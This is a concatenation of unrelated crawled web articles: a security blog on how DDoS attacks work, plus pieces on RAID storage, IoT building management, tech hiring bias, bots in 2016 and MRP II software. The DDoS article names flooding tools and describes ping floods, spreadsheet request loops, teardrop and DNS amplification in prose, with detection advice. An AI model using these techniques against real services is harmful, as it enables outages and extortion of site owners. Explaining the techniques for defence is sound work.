Because the toaster was faulty, it flooded the electrical installation with excessive current it wasn’t designed to handle. This blew up the fuse, and shut down the installation.
A nearly identical process takes place in DDoS attacks. Replace “electrical current” with “information”, and “installation” with the term “information processor”, and you’ve already understood the basic principle.
What does DDoS stand for?
A DDoS attack is short for “Distributed Denial of Service”, and is the bigger brother of simpler denial-of-service attacks.
The point of these exercises is to take down a website or service, typically by flooding it with more information than the victim website can process.
DoS attacks typically send information from only one source (think PC’s, or other internet-connected devices), but a DDoS attack uses thousands, or hundreds of thousands, of sources to flood its target. This makes it a few orders of magnitude more powerful than its smaller sibling.
Measuring the strength of a DDoS
A 1 GB/s denial-of-service attack is strong enough to take down most of the websites out there, since their data hosting simply doesn’t offer enough bandwidth to keep the site online.
One of the biggest ever recorded was the Mirai botnet attack in Autumn 2016, coming at over 1 terabytes per second. It overwhelmed the Dyn DNS provider, and then the effect cascaded, temporarily taking down major websites such as Reddit or Twitter.
Nowadays, even beginner hackers who can’t even code to save their life (called script kiddies) have access to big and powerful botnets-for-hire that can flood a target with 100 GB/s. This type threat isn’t going away, quite the contrary. Quite the contrary, it will only become powerful and widely accessible than before.
Why would anybody do this?
Compared to other kinds of cyber attacks, DDoS attacks are messy, overly destructive, and very difficult to pull off. Because of this, they don’t make much sense from a financial perspective.
So cybercriminals might use them as a blunt weapon against some of their competitors. For instance, they might want to bring down a site hosting a cybersecurity tool, or bring down a small online shop operating in the same niche.
In other cases, malicious hackers use them as a form of extortion, where the victim has to pay a fee in order for the denial of service to stop.
Also, a DDoS attack can act as a smokescreen, hiding the real endgame, such as infecting the target with malware or extracting sensitive data.
And in what constitutes a frequent scenario, the attacker might not even have a motive. Instead, he just does it for the “giggles”, seeking to test his abilities or just to cause mayhem.
SECURE YOUR ONLINE BROWSING!Try it FREE
30-day Free Trial
How to DDoS someone, cybercriminal style
There’s more than one way of carrying out a denial-of-service attack. Some methods are easier to execute than others, but not as powerful. Other times, the attacker might want to go the extra mile, to really be sure the victim gets the message, so he can hire a dedicated botnet to carry out the attack..
A botnet is a collection of computers or other Internet-connected devices that have been infected with malware, and now respond to the orders and commands of a central computer, called the Command and Control center.
The big botnets have a web of millions of devices, and most of the owners have no clue their devices are compromised.
Usually, botnets are used for a wide variety of illegal activities, such as pushing out spam emails, phishing or cryptocurrency mining.
Some, however, are available to rent for the highest bidder, who can use them in whatever way seems fit. Oftentimes, this means a DDoS attack.
DDoS programs and tools
Small scale hackers who don’t have access to botnets, have to rely on their own computers. This means using specialized tools, that can direct Internet traffic to a certain target.
Of course, the amount of traffic an individual computer can send is small, but crowdsource a few hundreds or thousands of users, and things suddenly grow in scope.
This particular tactic has been successfully employed by Anonymous. In short, they send a call to their followers, asking them to download a particular tool, and be active on messaging boards, such as IRC, at a particular time. They then simultaneously attack the target website or service, bringing it down.
Here’s a sample list of tools that malicious hackers use to carry out denial of service attacks:
- Low Orbit Ion Cannon, shortened to LOIC.
- HULK (HTTP Unbearable Load King).
- DDOSIM – Layer 7 DDoS Simulator
- Tor’s Hammer.
How to DDoS an IP using cmd
One of the most basic and rudimentary denial-of-service methods is called the “ping of death”, and uses the Command Prompt to flood an Internet Protocol address with data packets.
Because of its small scale and basic nature, ping of death attacks usually work best against smaller targets. For instance, the attacker can target:
a) A single computer. However, in order for this to be successful, the malicious hacker must first find out the IP address of the device.
b) A wireless router. Flooding the router with data packets will prevent it from sending out Internet traffic to all other devices connected to it. In effect, this cuts the Internet access of any device that used the router.
In order to launch a ping denial-of-service attack, the malicious hacker first needs to find out the IP of the victim’s computer or device. This is a relatively straightforward task, however.
A ping of death is small in scale, and fairly basic, so it’s mostly efficient against particular devices. However, if multiple computers come together, it’s possible for a handful of these to bring down a smallish website without the proper infrastructure to deal with this threat.
Using Google Spreadsheet to send countless requests
An attacker can use Google Spreadsheets to continuously ask the victim’s website to provide an image or PDF stored in the cache. Using a script, he will create a neverending loop, where the Google Spreadsheet constantly asks the website to fetch the image.
This huge amount of requests overwhelms the site and blocks it from sending outward traffic to visitors.
Unlike other denial-of-service tactics, this one doesn’t send large information packages to flood the website, but instead, it makes data requests, which are much, much smaller.
In other words, the attacker doesn’t need to rely on sizeable botnet or thousands of other users to achieve a similar effect.
In most cases, the information transmitted between a client device and the server is too big to be sent in one piece. Because of this, the data is broken into smaller packets, and then reassembled again once it reaches the server.
The server knows the order of reassembly through a parameter called “offset”. Think of it as instructions to building a LEGO toy.
What a teardrop attack does, is to send data packets at the server that make no sense, and have overlapping or dysfunctional offset parameters. The server tries, and fails, to order the data according to the malicious offset parameters. This quickly consumes available resources until it grinds to a halt, taking down the website with it.
Amplifying a DDoS attack
To maximize every data byte, malicious hackers will sometimes amplify the flood by using a DNS reflection attack.
This is a multiple-step process:
- The attacker will assume the identity of the victim by forging its IP address.
- Using the forged identity, he will then send out countless DNS queries to an open DNS resolver.
- The DNS resolver processes each query, and then sends the information back to victim device who had its identity stolen. However, the information packets the DNS resolver sends out are much bigger than the queries it receives.
What happens during amplification is that every 1 byte of information becomes 30 or 40 bytes, sometimes even more. Amplify this further using a botnet with a few thousand computers, and you can end up sending 100 gygabytes of traffic towards a site.
The types of DDoS attacks
Denial-of-Service attacks fall in two broad categories, depending on their main attack vector:
- Application Layer.
- Network Layer.
Network Layer attacks
A network layer attack works by flooding the infrastructure used to host a website with vast amounts of data.
Many providers nowadays claim they offer “unmetered” bandwidth, meaning you should theoretically never have to worry about excessive amounts of traffic taking down your site. However, this “unmetered” bandwidth comes with strings attached.
To put things into perspective, a website with some 15,000 monthly pageviews and hundreds of pages requires around 50 gigabytes of monthly bandwidth to operate optimally. Keep in mind that this traffic is widely dispersed over the course of an entire month. A site like this has no chance to stay online if a DDoS attack rams it with 30 or 40 gigs of traffic in a one-hour period.
As a self-defense measure, the hosting provider itself will simply cut off hosting you while the traffic normalizes. Although this might seem cold, this prevents spill-over effects that might affect other clients of the hosting provider.
Network layer attacks themselves come in multiple shapes and sizes. Here are a few of the more frequent ones:
- SYN Attacks. SYN is a shorthand for “synchronize”, and is a message that a client (such as a PC) sends to the server for the two to be in sync.
- DNS reflecting.
- UDP amplification attacks.
An upside to this kind of attack, if you can call it that, is that the huge amounts of traffic involved make it easier for victims to figure out what kind of denial of service they’re facing.
Application layer attack
Application layer attacks are much more surgical in nature compared to network ones. These work by targeting certain programs or software that a website uses in its day-to-day functioning.
For instance, an application layer attack will target a site’s WordPress installation, PHP scripts or database communication.
This type of software can’t handle anywhere near the load of wider network infrastructure, so even a comparatively small DDoS of a few megabytes per second can take it down.
The typical application layer DDoS is the HTTP flood. This works by abusing one of two commands, POST or GET. The GET command is a simple one that recovers static content, like the web page itself or an image on it.
The POST command is more resource-intensive, since it triggers complex background processes with a greater impact on server performance.
An HTTP flood will generate a huge amount of internal server requests that the application cannot handle, so it then flops and takes down the entire site with it.
How do you detect a DDoS attack?
Analyze the traffic, is it a usage spike or an attack?
Traffic spikes are a frequent occurrence, and can actually be big enough to take down poorly prepared websites. A site designed to cope with an average of 30-40 concurrent users will come under strain if a spike brings up the number to 600-700 users at the same time.
The first sign of a DDoS attack is a strong slowdown in server performance or an outright crash. 503 “Service Unavailable” errors should start around this time. Even if the server doesn’t crash and clings on to dear life, critical processes that used to take seconds to complete now take minutes.
Wireshark is a great tool to help you figure out if what you’re going through is a DDoS. Among its many features, it monitors what IP addresses connect to your PC or server, and also how many packets it sends.
Of course, if the attacker uses a VPN or a botnet, you’ll see a whole bunch of IPs, instead of a single one. Here’s a more in-depth rundown on how to use Wireshark to figure out if you’re on the wrong end of a denial-of-service.
Microsoft Windows also comes with a native tool called Netstat, which shows you what devices are connecting to your server, and other similar statistics.
To open the tool, write cmd in the Start menu search bar, and then type in netstat –an. This will take you to a screen showing your own internal IP in the left-hand column, while the right-hand column holds all of the external IPs connected to your device.
The screenshot above is for a normal connection. In it, you can see a few other IPs that communicate normally with the device.
Now, here’s how a DDoS attack would look like:
On the right hand side, you can see that a single external IP repeatedly tries to connect to your own device. While not always indicative of a DDoS, this is a sign that something fishy is going, and warrants further investigation.
DDoS attacks will only get more frequent as time passes and script kiddies get access to ever more sophisticated and cheap attack methods. Fortunately, denial-of-service attacks are short-lived affairs, and tend to have a short-term impact. Of course, this isn’t always the case, so it’s best to be prepared for the worst-case scenario.
EASY AND RELIABLE. WORKS WITH ANY ANTIVIRUS.Download Free Trial
NO CREDIT CARD REQUIRED | <urn:uuid:002aa3dd-c5a4-424d-b93d-28d0e407e901> | CC-MAIN-2022-40 | https://heimdalsecurity.com/blog/how-to-ddos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.925868 | 3,084 | 2.859375 | 3 |
In this SAN and NAS Storage tutorial, I explain what RAID is, how it works, and the differences between the different RAID types. Depending on what you’re reading, RAID stands for either “Redundant Array of Inexpensive Disks,” or “Redundant Array of Independent Disks.”
The original name was inexpensive disks, but then the drive manufacturers thought that didn’t sound very good from a marketing point of view, so the more common modern term now is “Redundant Array of Independent Disks.” Scroll down for the video and also text tutorial.
Want the complete course? Click here to get the Introduction to SAN and NAS Storage course for free
RAID Storage Overview – Video Tutorial
With RAID, multiple physical disks are combined into a single logical unit. The reason we do that is to provide redundancy or improve performance, or both, when we compare that set of disks to a single disk. There’s different levels of RAID which are assigned different numbers, such as RAID 1 and RAID 5. They provide different levels of redundancy or performance.
RAID can be managed in software by the operating system or in hardware by a controller.
In the video I cover the popular levels of RAID. The other types are not commonly used in today’s production networks.
The first type to cover is RAID 0, which is also known as a striped set. Data is split evenly across all the disks in the set. That provides better performance, but no redundancy. If any disk in the set fails, then all the data is lost and we would have to recover that from an external backup.
It’s actually less reliable than a single disk, because if for example you’ve got 5 disks, at any given point of time it’s more likely that one of them is going to fail than if you just had that single disk.
RAID 0 gives us better performance because we can write our data to multiple disks at the same time. It’s quicker to write the same amount of data concurrently to multiple disks than it is to write it to one disk. There is some overhead so it’s not as simple as if you’ve got 5 disks you will get 5 times the speed, but the more disks (also called spindles) you have, the better performance you’re going to get.
The next RAID type we’re going to cover is RAID 1, which is also known as a mirrored set. RAID 1 is like a reverse of RAID 0. A copy of the data is written to both disks in the set which provides redundancy. If one disk fails, we still have a working copy of the data on the other disk. Write performance is not improved, as we write a copy of the same data to both disks at the same time. Read performance, however, is improved as reads can be serviced by either disk.
The next RAID type is RAID 4. This uses block level striping with a dedicated parity disk. The parity disk is used for redundancy – data can be recreated from parity if one of the disks in the set fails. We can survive a single disk in the set failing.
Read performance is improved as multiple disks concurrently service reads. Write performance is not improved, as all parity data is written to the same single disk.
When you use RAID 4, you don’t get the full capacity of all the disks in the set. If you’ve got 3 drives, you’ll get the capacity of two disks as your usable capacity, because one of the drives is reserved for the parity information.
If I do lose a drive in my set I can still carry on servicing the data to my clients. There will be a performance hit when this is happening, because the data is going to have to be recalculated from parity for that failed drive.
The failed drive should be replaced as soon as possible. It will take some time to calculate from parity the data that was on there and write it back onto the disk. Once that has been completed, then it will be back up at the initial level of performance.
Our next type of RAID to discuss is RAID 5, which uses block level striping with distributed parity. RAID 4 was block level striping with a dedicated parity drive. RAID 5 distributes the parity information across all the drives in the set. Similarly to RAID 4, data can be recreated from parity if one of the disks in the set fails. Read performance is improved, as multiple disks concurrently serve reads, and write performance is also improved as parity data is spread throughout the set. That’s one advantage of RAID 5 over RAID 4. Other than that, they’re very similar.
The next type is RAID 6 which is similar to RAID 5. It uses block level striping with two parity blocks distributed throughout the set. RAID 5 has got one parity block, RAID 6 has got two parity blocks. Because it’s got two, data can be recreated from parity if two of the disks in the set fails. We need to have three drives fail before we would have to recover from an external backup. With RAID 6, like RAID 5, read and write performance is improved.
HYBRID RAID – RAID 10, 0+1, and 50
We can also set up hybrid RAID, where RAID levels are nested into a hybrid set.
In RAID 10, or 1 + 0, multiple RAID 1 mirrored sets are nested into a RAID 0 stripe set.
In RAID 0 + 1 we do it the other way around, and multiple RAID 0 sets are nested into a RAID 1 mirror.
In RAID 50, or 5 + 0, multiple RAID 5 striped sets with parity are nested into a RAID 0 striped set.
IMPORTANT – DISK TYPE, CAPACITY AND SPEED
A word of warning. If you use different capacity sized disks, the usable size is going to be limited to the size of the smallest disk. Say we had a RAID group already which had five 500 gigabyte drives in it. Then we want to add some additional storage space, so we add a 1 terabyte drive. That 1 terabyte drive will be sized down to 500 gigabytes, the same size as the rest of the disks, so 500 gigabytes would be wasted. Obviously you don’t want to do that. Make sure that all the disks in your RAID group are the same size.
There is a similar issue with speed. Basically, all the disks in your RAID set should be the same type (SSD/SAS/SATA), size and speed.
Free ‘Introduction to SAN and NAS Storage’ training course
Get my Introduction to SAN and NAS Storage video training for free here: | <urn:uuid:201ac370-1318-4b40-b4a4-b8a5ab19ed84> | CC-MAIN-2022-40 | https://www.flackbox.com/raid-storage | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.946359 | 1,426 | 3.28125 | 3 |
The complexity of new state-of-the-art buildings is skyrocketing; Aquariums, wedding chapels, rollercoasters, and even artificial canals are becoming the norm for office centres and shopping malls.
This is way too much to be efficiently managed by people alone, says Sergiy Seletskyi, IoT practice leader and senior solution architect at Intellias. And far too often, businesses have no idea how many resources their buildings waste and, more importantly, what it actually costs them.
Fortunately, technologies are getting more advanced, allowing for monitoring, automating, and optimising building operations. On the surface, it may seem that only digital-native businesses can leverage technological advancements. But that couldn’t be further from the truth.
Every single activity within a building can now generate data. Powered by IoT devices, a building management system (BMS) can collect and analyse data to offer granular visibility into what’s happening inside a building.
What is a BMS?
A building management system controls technical and electrical installations in a building by maintaining predefined parameters according to changing conditions.
Fifty years ago, the functionality of early BMSs was limited to simply switching on or off the right equipment at the right time of the day or year. But even these basic commands eased the management of essential facility assets such as lighting, pumps, elevators, and HVAC systems.
Over the years, a staggering range of new systems have appeared for everything from fire and smoke detection to video surveillance and security, switchable glass, exterior shading, water reclamation, and renewable energy.
Every new subsystem further burdens and increases the complexity of the entire facility management infrastructure. To address the challenge of maintaining and optimising building operations, BMSs evolved into complex IT infrastructure with layers of communication protocols, networks, and controls that integrate all subsystems into one ecosystem.
Today, an IoT-powered BMS offers significant opportunities for reducing energy consumption through HVAC monitoring, heat map analysis, and predictive maintenance. With a modern BMS, facility managers get a holistic view of a building’s operations, helping them make informed, business-critical decisions.
In the future, BMSs will get even more intelligent, enabling communication between buildings and bringing us toward a collaborative smart city ecosystem.
How does a BMS work?
A BMS architecture usually comprises four basic groups of devices; sensors, controllers, output devices, and a user interface.
At first, you configure the system via a control panel with a user interface. For example, you might set a daily schedule for temperature changes. Sensors collect whatever data you need about the building, whether it’s environmental conditions or energy consumption of systems and equipment.
Based on your settings and the information gathered by sensors, controllers decide on system adjustments for instance, to regulate the amount of outside air intake according to the CO2 level in the room. Then, output devices relays and actuators execute commands received from the controllers. At any time, you can use the control panel to monitor reported data, assess the BMS performance, and change settings if desired.
What are the benefits of a BMS?
Among the numerous benefits of implementing a BMS, energy savings is the most significant. Since cutting down on energy consumption directly means reduced energy spending, saving power improves a business’s profitability. Some estimates suggest that a BMS with strong data analytics can help reduce energy consumption by 30%.
Let’s look at a common use case; A BMS combines data on HVAC operations and the weather forecast to help you develop a strategy for optimising operating costs on a hot day. Knowing in advance the periods of high demand when energy is more expensive, you can cool the building earlier in the day to avoid high charges. Another example is integrating a schedule of meetings or events to automatically adjust lighting, air conditioning, or heating where they will occur.
A BMS with IoT sensors embedded in equipment can provide real-time data about power use, temperature, vibration, and other measurements. An AI-powered analytics platform can learn patterns in hardware operations to identify deviant performance and alert about imminent malfunctions. Thus, it can help you save on emergency repairs.
Predictive maintenance is particularly useful at industrial plants to avoid breakdowns of costly equipment, since even a small operational interruption may cause enormous financial losses. Restaurants and grocery stores can also use IoT sensors to monitor refrigeration units to ensure their produce is always fresh.
A BMS can significantly strengthen a building’s security and save tangible assets, intellectual property, and above all, human life. Based on data from gas and smoke detectors, a BMS system can instantly open up emergency routes and give occupants directions to exits, saving precious time during an evacuation.
Closed-circuit television, motion sensors, and glass break detectors provide superior real-time intrusion control. For example, say a camera sees two people entering the building together at off-hours. The system checks the entrance log to find out how many people carded in at the specified door at the specified time. If two people carded in, the system returns to monitoring; otherwise, it alerts security about possible unauthorised access.
To create a dynamic and comfortable environment for occupants, a BMS collects information from connected sensors, beacons, Wi-Fi network, and PC activity. Using this information, you can provide your employees, customers, or guests with a unique presence experience.
Consider a simple use case; Access control cards are programmed with cardholders’ credentials, including personalised climate preferences. Integrated into the BMS, these settings are then applied based on a person’s location within a building.
How does this technology suit your business?
By adopting an IoT-based BMS for new and retrofitted facilities, you can optimise operations within your properties, save on energy consumption, ensure strong security, and review the way you use space and assets.
You might say that a BMS works with new buildings that were designed to be smart. But how about older buildings? Older buildings can be retrofitted and automated in smaller but still smart ways, becoming important pieces of the sustainability puzzle.
Technological transformation is not for digital businesses only. It’s for everyone willing to embrace and benefit from advanced technology.
The author is Sergiy Seletskyi, IoT practice leader and senior solution architect at Intellias.
About the author
Sergiy helps companies harness the right IoT technology stack to scale business and make it future-proof. Strategic thinker with extensive knowledge of the IT Industry in a wide variety of innovative solutions for different business domains. | <urn:uuid:56a3cef4-01c7-4ed8-ade1-9674d67e3bc7> | CC-MAIN-2022-40 | https://www.iot-now.com/2021/04/26/109550-building-management-system-your-ticket-to-a-smart-city/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337731.82/warc/CC-MAIN-20221006061224-20221006091224-00741.warc.gz | en | 0.919127 | 1,394 | 2.859375 | 3 |
The high-tech industry famously faces a shortage of qualified labor. However, according to a “Diversity in High Tech” report from the U.S. Equal Employment Opportunity Commission (EEOC), that shortage would be far less dramatic were U.S. tech firms to hire all qualified candidates, rather than mostly just white men.
While there is some truth to the so-called “pipeline” problem, said the report, “there are additional factors at play.”
There is “anxiety” over the ability of the U.S. educational system to supply a workforce that can adequately support the country’s rapidly expanding STEM (science, technology, engineering and math) industries, explained the report. However, the study concluded: “Stereotyping and bias, often implicit and unconscious, have led to underutilization of the available workforce. The result is an overwhelming dominance of white men and scant participation of African Americans and other racial minorities. …. It has been shown, for example, that men are twice as likely as women to be hired for a job in mathematics when the only difference between candidates is gender.”
The report went on to note, citing The Urban Institute, that the U.S. educational system actually produces more qualified science and engineering graduates than there are jobs available. The problem is that “close to 50 percent of STEM graduates in the U.S. are not hired in STEM-related fields.”
The tech industry also faces an “exiting” problem, reports the EEOC. Women, feeling unsupported or without a path to growth, wind up leaving STEM professions.
“While 80 of U.S. women working in STEM fields say they love their work, 32 percent also say they feel stalled and are likely to quit within a year,” stated the report. “Research by The Center for Work-Life Policy shows that 41 percent of qualified scientists, engineers and technologists are women at the lower rungs of corporate ladders but more than half quit their jobs.”
More than anything, it’s bias that brings women to leave. They face inhospitable work cultures, isolation, conflicting work styles (men like to “firefight,” while women tend to plan, it explained), schedules that conflict with “women’s heavy household management workload” and a lack of advancement.
Further, these experiences were heightened for non-White women.
In a survey of 557 female scientists, two-thirds reported having to prove themselves over and over again, and having their successes discounted or their expertise questioned—while three-fourths of Black women reported the same.
Fifty-three percent of the scientists reported experiencing backlash for being decisive, outspoken or speaking their minds.
Thirty-four percent reported feeling pressured to play traditionally feminine roles, a figure that rose to 41 percent among Asian women. And the women—particularly Black and Latina—reported being seen as “angry” when they didn’t conform to a female stereotype.
Additionally, there’s a racial and ethnic pay gap in STEM fields.
“Asian-Americans reported the highest average earnings in STEM occupations,” said the report, “while non-Hispanic whites also had above-average earnings; black and Hispanic professionals earned below-average wages in 2012.”
Adding greater insult to the injury of inequality is the fact that the high-tech sector is one of the best sectors to be in.
“These jobs tend to provide higher pay and better benefits, and they have been more resilient to economic downturns than other private-sector industries over the past decade,” said the report, making them “important to the national economic and employment outlook.”
The EEOC added, “The high-tech sector [affects] how we communicate and access information, distribute products and services, and address critical societal problems. Because this sector is the source of an increasing number of jobs, it is particularly important that the [EEOC] and its stakeholders understand the emerging trends in this industry.” | <urn:uuid:c91bd92e-ba25-4a33-ad7a-21d74a4ea55c> | CC-MAIN-2022-40 | https://www.eweek.com/it-management/tech-s-problem-is-bias-not-qualified-candidates-report/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030338213.55/warc/CC-MAIN-20221007143842-20221007173842-00741.warc.gz | en | 0.962559 | 862 | 2.625 | 3 |
2016 was the biggest year by far for all sorts of bots. From Chatbots to bad bots, the past year was eventful to say the least. With more than 980+ cyber security breaches across all online businesses and 35 million accounts exposed. Yahoo! In a 2016 report, disclosed that more than 1 billion accounts have been stolen. $400 billion was reportedly lost to cyber attacks across all industries this year. With this trend the losses are set to top out at around $2.1 Trillion by 2019.
Now, let’s look at the top 4 incidences of bots that altered history in 2016.
- Dyn Cyberattack (Mirai) – The 2016 Dyn cyberattack took place on October 21st 2016. The attack was carried out by a malware known as Mirai. Mirai ( Japanese word for “The Future”) is a malicious software that turned Internet of Things (IoT) into bots, which was later used in the record breaking exploit. Since 2010, the number of devices connected to the internet has doubled from 12.5 billion devices to 25 billion. Mirai malware worked on the principle of identifying vulnerable IoT devices with default username and password, and planting the malware into them. Once the devices turned bad, bots in tandem were able to produce over 1.2 terabytes/sec attacks. Major websites such as Amazon.com, Netflix, CNN, BBC etc were taken down by the bad bots. This is by far the biggest attack on the free internet. This is a case in point to understand what it meant for services routed via DNS during the Dyn cyberattack
- Bots used for influencing public: Social media bots were the most active in 2016. With major events such as Brexit and US elections, social media bots were the most influential.
Brexit: Automated social media accounts produced by both sides of the debate created these bots to have a massive influence on the referendum vote; especially on those last-minute ‘undecideds’ Researchers from Oxford University have found that bots played a strategic role during the debate. The social media bots helped circulating ‘repetitive’ political content to manipulate the thinking of the general public. Social media bots had a very simple role to play during Brexit, they had to tweet pro or anti Brexit tweets over and over again or just retweet /share messages of influencers on either sides. This helped them float the message they wanted for a much longer time, on the social media platforms, than required.
US elections: As per Twitter Audit, Donald Trump’s twitter account had almost 40% inactive, fake and spam followers, while Hillary Clinton had around 37%. The number roughly adds up to more than 7 million fake/inactive bot accounts that were circulating messages across the globe. These bot accounts helped in propagating messages for both the candidates involved and heavily influenced the undecided voter.
Under the scanner, Impact of Twitter, Facebook and other social media might be not be considered a serious threat. But the bots spreading propaganda are usually encountered by journalists who use social media. Journalists, in-turn, interpret these bot propagated messages as a trend among people and report it. This increases the influence of such bad social media bots even more. It is crazy how bots can influence and change the course of history for 2 major nations last year, and it’s just the beginning. German Chancellor Angela Merkel’s apprehensions on bots manipulating the upcoming German elections are not unfounded.
- The Rise of Chatbots: 2016 is considered to be the rise of chatbots. With every major ecommerce, service provider producing a chatbot. Early 2016 started a race among companies to create chatbots. Chatbots are highly regarded as the new automated intelligence trend. These bots are created to interact with the user to provide information or to execute simple tasks.
Good chatbots gone bad: When Microsoft launched Tay (AI Twitter chat bot) on March 23, 2016, it was the start of a new era. Tay was programmed to learn from its interactions with real users on twitter. Tay, however, ended up becoming a vulgar, racist bot within a few hours. The bot however was taken down by Microsoft within 16 hours.
By and by, Tay tweeted 96,000 times before it went offline..
- BOTS Act passed in the US senate (Ticket Scalping bots) : Ticket scalping bots were made illegal in the US during December 2016. President Obama had signed the BOTS (Better Online Ticket Sales) Act of 2016. The significance of this bill is that any software or automated bot program used to scalp tickets is now completely ILLEGAL. Finally, ticket scalping is a federal offense. Ticket scalping this year was brought to light by Lin Manuel Miranda, who was the star of the Broadway show Hamilton. Hamilton tickets were scalped using bots online and were reselling for a higher price on another website. With the help of the senators and mainstream media, congress was able to pass the bill. Ticket scalping bots are notorious for buying out thousands of tickets within a matter of seconds. This frustrates genuine users that visit the site, in the long run hurts the producers as well.
According to a famous online ticket selling website, TicketMaster. In 2016, bots tried to buy 5 billion tickets, or 10,000 a minute, on their website. This resulted in 60% of the tickets getting scalped by bots.
With the surge in malicious bots, there is a need to stop them before they could harm your online businesses. Bots have been increasingly malicious and damaging for all online businesses.
So, have you thought about how your online business may be silently targeted by bad bots? How is your 2017 IT roadmap poised to address bot threats? | <urn:uuid:a9ef24d9-bb52-42ab-add1-d9155ede3aa1> | CC-MAIN-2022-40 | https://informationsecuritybuzz.com/articles/2016-four-ways-bots-altered-history/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030335530.56/warc/CC-MAIN-20221001035148-20221001065148-00141.warc.gz | en | 0.960797 | 1,169 | 2.71875 | 3 |
MRP stands for Manufacturing Resource Planning, a system designed to help companies plan their manufacturing process more efficiently and accurately.
Manufacturers use MRP systems to forecast demand, schedule production processes such as assembly lines, and maintain inventory levels across various channels like warehouses or stores.
This post will discuss the basics of MRP II.
Overview of MRP I and MRP II
It is an integral part of an information system used by businesses. Its advent aims to fix the short comes or constraints of Material Requirement Planning (MRP I).
Material Requirements Planning (MRP I) is a leading software-based integrated information system that boosts overall performance.
Material Requirement Planning is an integrated information system that relies on a sales forecast-based helpful system in scheduling raw material deliveries and quantities.
Aside from all these managerial uses, Material Requirement Planning has been extensively used to precisely predict the amount of human capital, machinery, and IT Infrastructure required to achieve a sales target.
The integrated information system of MRP II concentrates, accumulates, and processes the information so that the third party can leverage this information for scheduling, design engineering, inventory management, and cost control in manufacturing.
Material Resource Planning and Manufacturing Resource Planning are the predecessors of Enterprise Resource Planning(ERP), a procedure-oriented methodology in which a manufacturer smartly manages all the critical aspects of his business.
Many large organizations have already developed too much software to assist companies in properly implementing Enterprise Resource Planning (ERP).
Definition of Manufacturing Resource Planning
Manufacturing Resource Planning is a computer-based integrated information system that can devise the most precise and accurate production schedule by leveraging the real-time data to create harmony between the arrival of raw material components with the machine and labor availability.
It is often a helpful and most relevant tool to enhance the core functionality of the Enterprise Resource Planning (ERP) system.
The goal behind it is, to the extent, the capability of Material Resource planning.
By the end of the 1980s, manufacturers and business owners realized that they needed a specific kind of software that could easily incorporate into their accounting system and prophesy the amount of inventory required to accomplish a particular task.
MRP II is software that can effectively address all the requirements of manufacturers. To maintain backward compatibility, it contains all the critical features of MRP I.
Manufacturing resource planning software
It is a tool that helps manufacturing businesses and supply chain managers to stay in today’s competitive business world.
As of now, the following vendors are well-known providers of the MRP II software.
- Oracle Netsuite Manufacturing Edition
- Microsoft dynamics
- S2K Enterprise
Importance of Manufacture Resource Planning Software
This software allows you to do the following,
- Acquire valuable details about the right time of ordering.
- How much raw material does he need to order from the suppliers?
- Generate orders for raw material input. The periodic arrangement of all the orders
These are crucial to address the ever-growing demands of customers and the whole manufacturing process.
This software regularly calculates raw materials requirements, and all the calculations are based on order forecasts.
Additionally, this software also changes to offset the potential issues that may arise in the future.
This attribute is way more effective and accurate than the traditional management system.
Few Critical Aspects
Now I’ll be listing the critical aspects of it categorically.
MRP II gleaned valuable feedback from the production floor and stored this information more robustly and systematically.
MRP II integrates the stored information to all schedule levels to ensure the regular up-gradation of the next run.
Inventory management control includes a scheduling capability that strongly emphasizes the significant resources, such as plant, machinery, and raw materials, which are crucial in producing finishing goods.
MRP II generates the most precise and accurate data that can assist an individual in gaining firm control over the manufacturing process
Software Extension Capabilities
Aside from the inventory and recovery control, other programs are also incorporated into the MRP II.
Some of these programs are specifically designed to make the scheduling process more helpful.
MRP II also comes with the in-built option for sale ordering processing. In addition, stock recording and cost management accounting lie in their realm.
The above attributes are embedded in the company’s primary database system.
MRP has in-built advanced planning capabilities that include:
- Minimize the Panning activities
- Automated computerized ordering of raw material for the production of finishing goods
- Hard and soft allocation
Optimizing the Labor Requirement
For example, the software calculates the labor required to meet daily, weekly, or monthly labor schedules.
MRP II smartly manages the labor based on qualification and the relevant skill sets.
MRP II is useful when the initial data must be correct and accurate.
It is evident from the past track record that the companies that develop and deploy software strongly recommend their users to enter only the correct and accurate data. That helps in utilizing the full potential of MRP II.
Benefits of Manufacturing Resource Planning
These are the potential benefits,
- Undoubtedly, MRP is an innovative and highly competitive tool that has completely revolutionized the traditional stock control and management method.
- Software framed an effective and consistent production schedule, allowing any company to manage its operating expenses smartly by reducing the money, time, and human capital.
- Planning with the aid of automated software MRP II makes a company way more efficient than ever before. Thus, in simple words, we can say that MRP II acts as a helpful tool for profit optimization as it reduces unnecessary expenses.
- Data gleaned through MRP allows the companies to frame an effective strategy for the future and prophesy how their overall strategy can affect the overall profitability of the business.
- The automated system of MRP provides a piece of more robust and detailed information that any company can easily leverage to accomplish its core functions, such as planning, effective decision making, and production.
Difference between MRP I and MRP II
MRP II is an advanced version of MRP I. MRP II is much ultra-modern software that provides the best vision into all production areas. MRP II includes the functionalities of MRP I along with some additional functionalities. MRP I is the plan for the materials requirements, and MRP II is the plan for resource requirements.
The most prominent manufacturing business model that benefits from the Manufacturing Resource Planning Integrated information system involves many assembly lines.
Small and medium-scale businesses or SMEs can also leverage it to enhance their production capacity and revenue. | <urn:uuid:bd44f315-e66d-4d24-a747-d46bcbb0ef9d> | CC-MAIN-2022-40 | https://www.erp-information.com/manufacturing-resource-planning.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2022-40/segments/1664030337322.29/warc/CC-MAIN-20221002115028-20221002145028-00141.warc.gz | en | 0.915079 | 1,412 | 3.1875 | 3 |
Not many things keep company executives and heads of federal agencies up at night like mega cyber breaches do. Mega cyber breaches are not only on the rise, but are also becoming increasingly costly to treat. IBM found that a mega-breach can cost an organization anywhere between $40 to a whopping $350 million.
There are two variables contributing to mega breaches, and these variables are spread among most organizations.
The only realistic assumption, as these technologies become more advanced and prevalent, is that the security methods that support these technologies are just as sophisticated.
The dark side or 4IR
Cloud computing and IoT are two of the Fourth Industrial Revolution's main powers. The former provides flexibility, smooth integration, a dynamic environment for development, while the latter creates a world that is more connected than many would have ever imagined.
